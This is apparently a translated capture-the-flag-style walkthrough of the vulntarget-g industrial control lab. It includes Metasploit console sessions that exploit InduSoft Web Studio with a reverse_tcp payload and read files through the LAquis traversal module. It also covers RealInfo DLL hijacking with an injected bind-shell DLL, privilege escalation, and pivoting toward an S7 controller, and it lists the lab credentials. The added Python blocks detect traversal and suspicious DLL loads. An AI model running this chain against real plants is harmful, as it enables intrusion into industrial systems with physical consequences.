This post is only for studying [vulntarget]; everything was tested and verified in a local environment, for no other purpose. Do not perform unauthorized testing.
1. Lab information:
Download address:
Baidu cloud link:
Link: https://pan.baidu.com/s/1R-9udIuoPavsTI18-lPP3Q?pwd=icsg
Extraction code: ics
Topology diagram:
Configuration:
Local VM network configuration
Network 1: 192.168.90.0/24
Network 2: 192.168.95.0/24
Network 3: 172.16.1.0/24
winxp_HMI:
[x.x.x.x (bridged IP) / 192.168.90.40]
Username: vuln  Password: Admin@123.
winxp_ZJQ:
[192.168.90.110 / 192.168.95.66]
winxp: winXP_ZIJINQIAO  Username 1: Administrator  Password 1: #xYpo3;W6aS
Username 2: vulntarget  Password 2: #xYpo3;W6aS
win7_ForceControl:
[192.168.95.110]
Username: win7  Password: admin
win7_S7-Client:
[192.168.95.100 / 172.16.1.37]
Username: tegratnluv  Password: Vu1Nt@rG3t9Gg
win7_S7-Server:
[172.16.1.3]
Username: Vu1NT4r93t  Password: welcometoICS
Official WP: vulntarget漏洞靶场系列(7)— vulntarget-g (vulntarget vulnerability lab series, part 7)
2. Tools, vulnerabilities and techniques used:
Tools:
Viper, searchsploit, DllInject, isf
Vulnerabilities or techniques:
Knowledge of ICS (industrial control system) vulnerabilities
References:
Reproducing the InduSoft Web Studio (embedded HMI software) RCE vulnerability
Notes on an industrial control lab and a brief introduction to industrial control protocols (explained in great detail)
3. Steps:
The lab involves many ICS systems that I am not familiar with, so I followed the official WP.
- Use a port scanner to find the target IP and port information. Here the target IP is 192.168.126.174; scan it directly with nmap:
- As hinted by the WP, attack with msf; here it took many runs before it succeeded:
```
msf6 > use exploit/windows/scada/indusoft_webstudio_exec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/scada/indusoft_webstudio_exec) > options
Module options (exploit/windows/scada/indusoft_webstudio_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.126.174 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 4322 yes The target port (TCP)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.126.168 yes The listen address (an interface may be specified)
LPORT 1111 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows XP / 2003
View the full module info with the info, or info -d command.
msf6 exploit(windows/scada/indusoft_webstudio_exec) >
```
- The session comes back as SYSTEM right away. On the desktop there is a file [工作日记.md] (work diary); opening it reveals some information:
```
InduSoft Web Studio, 紫金桥 (RealInfo), LAquis #systems involved
#InduSoft Web Studio embedded HMI software
======================================================
Study notes C:\Notes\HMI.txt
Software configuration C:\InduSoftWebStudiov7.1\Bin\CEView.ini
Detailed configuration data C:\InduSoftWebStudiov7.1\Drv\A2420.ini
======================================================
#紫金桥 (RealInfo)
======================================================
Installation information config file C:\RealInfo6.5\AUTORUN.INF
Notes document C:\RealInfo6.5\DeviceSetup\note.txt
Things to note C:\RealInfo6.5\ServerSetup\Public\tips.txt
Document on service items and similar information C:\RealInfo6.5\ServerSetup\RealServer\PrgTitle.Txt
Key configuration file C:\RealInfo6.5\ServerSetup\_Chinese\shortcut.ini; this is the Chinese version, for the English version change Chinese to English
======================================================
#LAquis
======================================================
Study document C:\Notes\SCADA.txt
Configuration file C:\LAquis\modelos\SAMPLE1.INI
OMRON protocol configuration file C:\LAquis\Apls\Examples\ExemplosCLPs\OMRON\OMRONTESTE1.INI
======================================================
#Stress testing
======================================================
Stress test information C:\document\information.txt
======================================================
#Notice
======================================================
Notice C:\document\score.txt
======================================================
```
- Add a route and probe the internal network with the MSF module:
```
msf6 auxiliary(scanner/portscan/tcp) > options
Module options (auxiliary/scanner/portscan/tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
DELAY 0 yes The delay between connections, per thread, in milliseconds
JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS 135,139,445,80,443,3389 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS 192.168.90.0/24 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
THREADS 10 yes The number of concurrent threads (max one per host)
TIMEOUT 1000 yes The socket connect timeout in milliseconds
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/portscan/tcp) > set PORTS 1-2000
PORTS => 1-2000
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.90.110
RHOSTS => 192.168.90.110
msf6 auxiliary(scanner/portscan/tcp) > run
```
- The scan shows ports 1234 and 1235 open:
- Add a proxy to reach it; the service is LAquis, and LAquis 4.1.0.2385 has an arbitrary file read vulnerability:
- Attack with MSF: use searchsploit on kali to find the LAquis exploit script, import it into Viper's MSF, run reload_all to load all modules, then use the newly added LAquis module:
- Configure it as follows and read the file:
```
msf6 exploit(windows/scada/indusoft_webstudio_exec) > use exploit/windows/scada/LAquis
msf6 auxiliary(windows/scada/LAquis) > set RHOSTS 192.168.90.110
RHOSTS => 192.168.90.110
msf6 auxiliary(windows/scada/LAquis) > set FILE document/information.txt
FILE => document/information.txt
msf6 auxiliary(windows/scada/LAquis) > options
Module options (auxiliary/windows/scada/LAquis):
Name Current Setting Required Description
---- --------------- -------- -----------
DEPTH 10 no Levels to reach base directory
FILE document/information.txt no This is the file to download
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.90.110 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 1234 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
View the full module info with the info, or info -d command.
msf6 auxiliary(windows/scada/LAquis) > run
[*] Running module against 192.168.90.110
[*] Stored 'document/information.txt' to '/root/.msf4/loot/20230711074514_default_192.168.90.110_laquis.file_535915.txt'
[*] Auxiliary module execution completed
msf6 auxiliary(windows/scada/LAquis) >
```
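The LAquis module's DEPTH option ("levels to reach base directory") together with its HTTP settings shows that the file read is a path traversal: the requested file name is joined to the web root without being confined to it. The following Python is an added example, not code from the original post or from the LAquis project; it contrasts the defective resolver pattern with a confined one and then flags such requests in a few constructed access log lines. The web root `/srv/scada/www`, the function names and the log lines are all assumptions made for the demonstration.

```python
"""
Added example, not code from the original post or from the LAquis project.

naive_resolve()  - the defective pattern: strip one "../" and concatenate.
safe_resolve()   - the confined pattern: normalise, then require the result
                   to stay under the web root.
find_traversal_attempts() - detection over constructed access log lines.
"""
import posixpath
import re
from urllib.parse import unquote

# Hypothetical web root; any path on a real LAquis install is an assumption.
WEB_ROOT = "/srv/scada/www"


def naive_resolve(web_root, requested):
    """Defective pattern: remove a single leading '../' and join.

    A request carrying more than one '../' still walks out of web_root,
    which is exactly what a DEPTH-style traversal relies on.
    """
    cleaned = requested.replace("../", "", 1)
    return posixpath.normpath(posixpath.join(web_root, cleaned))


def safe_resolve(web_root, requested):
    """Confined pattern; returns None for anything that would escape."""
    if "\x00" in requested:            # NUL truncation tricks
        return None
    requested = requested.replace("\\", "/")
    if requested.startswith("/"):      # absolute paths are never accepted
        return None
    root = posixpath.normpath(web_root)
    full = posixpath.normpath(posixpath.join(root, requested))
    if full != root and not full.startswith(root + "/"):
        return None
    return full


def escapes_root(web_root, resolved):
    """True when an already-resolved path lies outside web_root."""
    root = posixpath.normpath(web_root)
    return not (resolved == root or resolved.startswith(root + "/"))


# Constructed Apache-style access log lines (not captured from the lab).
SAMPLE_LOG = [
    '192.168.90.1 - - [11/Jul/2023:07:45:14 +0000] "GET /index.html HTTP/1.1" 200 512',
    '192.168.90.1 - - [11/Jul/2023:07:45:15 +0000] "GET /../../../../document/information.txt HTTP/1.1" 200 301',
    '192.168.90.1 - - [11/Jul/2023:07:45:16 +0000] "GET /%2e%2e/%2e%2e/document/information.txt HTTP/1.1" 200 301',
    '192.168.90.1 - - [11/Jul/2023:07:45:17 +0000] "GET /images/a..b.png HTTP/1.1" 200 90',
]

_REQ = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/')


def find_traversal_attempts(lines):
    """Return (client_ip, decoded_path) for requests with a '..' path segment.

    The path is percent-decoded twice so that encoded and double-encoded
    dots are caught; 'a..b.png' is not a '..' segment and is not reported.
    """
    hits = []
    for line in lines:
        m = _REQ.match(line)
        if not m:
            continue
        ip, raw = m.groups()
        path = unquote(unquote(raw)).replace("\\", "/")
        if ".." in path.split("/"):
            hits.append((ip, path))
    return hits


if __name__ == "__main__":
    bad = "../../document/information.txt"
    print("naive :", naive_resolve(WEB_ROOT, bad), "(escapes)" if escapes_root(WEB_ROOT, naive_resolve(WEB_ROOT, bad)) else "")
    print("safe  :", safe_resolve(WEB_ROOT, bad))
    for ip, path in find_traversal_attempts(SAMPLE_LOG):
        print("traversal attempt from", ip, "->", path)
```

The point of `safe_resolve()` is that confinement is checked on the normalised result rather than on the input string, so backslashes, repeated `../` and encoded dots are all handled by the same comparison; the detector applies the same idea to what the server logged.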
- Download the retrieved file and change the encoding to view it:
```
Host memo
Host 1:
Username: vuln
Password: Admin@123.
Host 2:
Username: vulntarget
Password: #xYpo3;W6aS
Host 3:
Username: win7
Password: admin
Host 4:
You finally made it here, but you did not get host 4's username and password. According to reliable information, host 4's username and password may be in the ForceControl (力控) software's user information. Can you find it?
```
- With the credentials given, configure a proxy and log in to host 2 over remote desktop:
- Here, check the software information and use 紫金桥 (RealInfo) DLL hijacking to get a session in msf:
- Set up a listener and generate a bind (forward-connect) DLL backdoor; the required tools also need to be uploaded:
```
msf6 payload(windows/meterpreter/bind_tcp) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 4444 yes The listen port
RHOST no The target address
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > set LPORT 1111
LPORT => 1111
msf6 exploit(multi/handler) > set RHOST 192.168.90.110
RHOST => 192.168.90.110
msf6 exploit(multi/handler) > run
```
mstsc.exe must be configured before it can transfer files.
- Inject the generated DLL into the progman process:
After the session comes in, escalate privileges with the command: getsystem
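From the defender's side, the DLL hijack against 紫金桥 (RealInfo) and the injection into progman both leave the same trace in endpoint telemetry: a process loading an unsigned DLL from a directory that legitimate software does not use. The Python below is an added example, not code from the original post or from Viper/DllInject; it runs a simple detector over constructed Sysmon Event ID 7 (Image loaded) records and shows why an allow-list for install roots outside Program Files (common for ICS packages such as the `C:\RealInfo6.5` tree listed in the lab's notes) is needed to keep the noise down. The records, the executable and DLL names and the allow-list are assumptions.

```python
"""
Added example, not code from the original post or from Viper/DllInject.

Flags unsigned DLLs loaded from outside trusted program directories in
constructed Sysmon Event ID 7 records (fields Image, ImageLoaded, Signed
are the names Sysmon emits; the values here are made up for the demo).
"""

# Directories that standard users cannot write to by default.
DEFAULT_TRUSTED = (
    r"C:\Windows",
    r"C:\Program Files",
    r"C:\Program Files (x86)",
)


def _norm(path):
    """Windows-style normalisation: one separator, no trailing slash, lower case."""
    return path.replace("/", "\\").rstrip("\\").lower()


def under_dir(path, base):
    """Case-insensitive test that path lies inside base (or is base itself)."""
    p, b = _norm(path), _norm(base)
    return p == b or p.startswith(b + "\\")


def is_suspicious_load(event, trusted=DEFAULT_TRUSTED):
    """True for an unsigned DLL loaded from outside every trusted directory."""
    signed = str(event.get("Signed", "false")).lower() == "true"
    if signed:
        return False
    return not any(under_dir(event["ImageLoaded"], d) for d in trusted)


def find_suspicious_loads(events, extra_trusted=()):
    """Return (process image, loaded DLL) pairs worth an analyst's attention.

    extra_trusted lets an operator add install roots of legitimate software
    that lives outside Program Files; without it every load from such a
    package is reported, which buries the real hit in noise.
    """
    trusted = tuple(DEFAULT_TRUSTED) + tuple(extra_trusted)
    return [
        (e["Image"], e["ImageLoaded"])
        for e in events
        if is_suspicious_load(e, trusted)
    ]


# Constructed Sysmon Event ID 7 records; file names are hypothetical.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\explorer.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll", "Signed": "true"},
    {"Image": r"C:\Windows\explorer.exe",
     "ImageLoaded": r"C:\Users\Public\update.dll", "Signed": "false"},
    {"Image": r"C:\RealInfo6.5\example.exe",          # hypothetical name
     "ImageLoaded": r"C:\RealInfo6.5\helper.dll", "Signed": "false"},
]


if __name__ == "__main__":
    print("untuned:", find_suspicious_loads(SAMPLE_EVENTS))
    print("tuned  :", find_suspicious_loads(SAMPLE_EVENTS, extra_trusted=[r"C:\RealInfo6.5"]))
```

Untuned, the detector reports both the DLL in `C:\Users\Public` and the vendor's own DLL under `C:\RealInfo6.5`; once the install root is allow-listed only the user-writable location remains, which is the load a DLL hijack or injection produces.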
- Add a route and scan the 192.168.95.1/24 range:
```
msf6 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > options
Module options (auxiliary/scanner/portscan/tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
DELAY 0 yes The delay between connections, per thread, in milliseconds
JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 1000 yes The socket connect timeout in milliseconds
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.95.1/24
RHOSTS => 192.168.95.1/24
msf6 auxiliary(scanner/portscan/tcp) > set ports 135,139,445
ports => 135,139,445
msf6 auxiliary(scanner/portscan/tcp) > run
```
Scanning was too slow, so I used NetBIOS discovery instead, which found the other live IPs 192.168.95.100 and 192.168.95.110:
- After testing, the password found earlier logs in to win7 successfully:
- Continuing from the earlier note, look for host 4's password; the user is found in the ForceControl (力控) software:
- Append xype to the password so it is easy to search for in a moment:
- Follow the steps below to locate the password information:
- After removing the appended xype the password is obtained; the credentials are tegratnluv/Vu1Nt@rG3t9Gg. Test remote login to the host; the target is the S7COMM client simulator:
- Generate a bind (forward-connect) backdoor with Viper, upload it and execute it:
- Found that the 172.16.1.37 segment also exists; continue searching the internal network and find the live IP 172.16.1.3:
According to the official WP, what remains is to force the lower-level device (下位机) into a stopped state. I do not know ICS, and this step did not succeed for me either; the tool's address is in the official WP.
- Full attack chain diagram:
The lab WP will be updated continuously…